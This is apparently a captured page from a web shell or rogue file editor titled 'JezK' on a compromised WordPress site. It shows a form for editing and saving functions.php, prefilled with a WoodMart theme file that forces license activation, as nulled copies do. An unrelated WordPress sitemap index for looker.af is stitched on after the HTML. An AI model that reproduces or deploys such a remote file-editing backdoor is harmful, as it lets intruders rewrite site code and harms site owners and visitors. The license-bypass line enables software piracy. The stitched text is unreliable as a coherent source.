
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: functions.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 *
 * The framework&#039;s functions and definitions
 */
update_option( &#039;woodmart_is_activated&#039;, &#039;1&#039; );
define( &#039;WOODMART_THEME_DIR&#039;, get_template_directory_uri() );
define( &#039;WOODMART_THEMEROOT&#039;, get_template_directory() );
define( &#039;WOODMART_IMAGES&#039;, WOODMART_THEME_DIR . &#039;/images&#039; );
define( &#039;WOODMART_SCRIPTS&#039;, WOODMART_THEME_DIR . &#039;/js&#039; );
define( &#039;WOODMART_STYLES&#039;, WOODMART_THEME_DIR . &#039;/css&#039; );
define( &#039;WOODMART_FRAMEWORK&#039;, &#039;/inc&#039; );
define( &#039;WOODMART_DUMMY&#039;, WOODMART_THEME_DIR . &#039;/inc/dummy-content&#039; );
define( &#039;WOODMART_CLASSES&#039;, WOODMART_THEMEROOT . &#039;/inc/classes&#039; );
define( &#039;WOODMART_CONFIGS&#039;, WOODMART_THEMEROOT . &#039;/inc/configs&#039; );
define( &#039;WOODMART_HEADER_BUILDER&#039;, WOODMART_THEME_DIR . &#039;/inc/header-builder&#039; );
define( &#039;WOODMART_ASSETS&#039;, WOODMART_THEME_DIR . &#039;/inc/admin/assets&#039; );
define( &#039;WOODMART_ASSETS_IMAGES&#039;, WOODMART_ASSETS . &#039;/images&#039; );
define( &#039;WOODMART_API_URL&#039;, &#039;https://xtemos.com/wp-json/xts/v1/&#039; );
define( &#039;WOODMART_DEMO_URL&#039;, &#039;https://woodmart.xtemos.com/&#039; );
define( &#039;WOODMART_PLUGINS_URL&#039;, WOODMART_DEMO_URL . &#039;plugins/&#039; );
define( &#039;WOODMART_DUMMY_URL&#039;, WOODMART_DEMO_URL . &#039;dummy-content-new/&#039; );
define( &#039;WOODMART_TOOLTIP_URL&#039;, WOODMART_DEMO_URL . &#039;theme-settings-tooltips/&#039; );
define( &#039;WOODMART_SLUG&#039;, &#039;woodmart&#039; );
define( &#039;WOODMART_CORE_VERSION&#039;, &#039;1.1.0&#039; );
define( &#039;WOODMART_WPB_CSS_VERSION&#039;, &#039;1.0.2&#039; );

if ( ! function_exists( &#039;woodmart_load_classes&#039; ) ) {
	function woodmart_load_classes() {
		$classes = array(
			&#039;class-singleton.php&#039;,
			&#039;class-api.php&#039;,
			&#039;class-config.php&#039;,
			&#039;class-layout.php&#039;,
			&#039;class-autoupdates.php&#039;,
			&#039;class-activation.php&#039;,
			&#039;class-notices.php&#039;,
			&#039;class-theme.php&#039;,
			&#039;class-registry.php&#039;,
		);

		foreach ( $classes as $class ) {
			require WOODMART_CLASSES . DIRECTORY_SEPARATOR . $class;
		}
	}
}

woodmart_load_classes();

new XTS\Theme();

define( &#039;WOODMART_VERSION&#039;, woodmart_get_theme_info( &#039;Version&#039; ) );
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
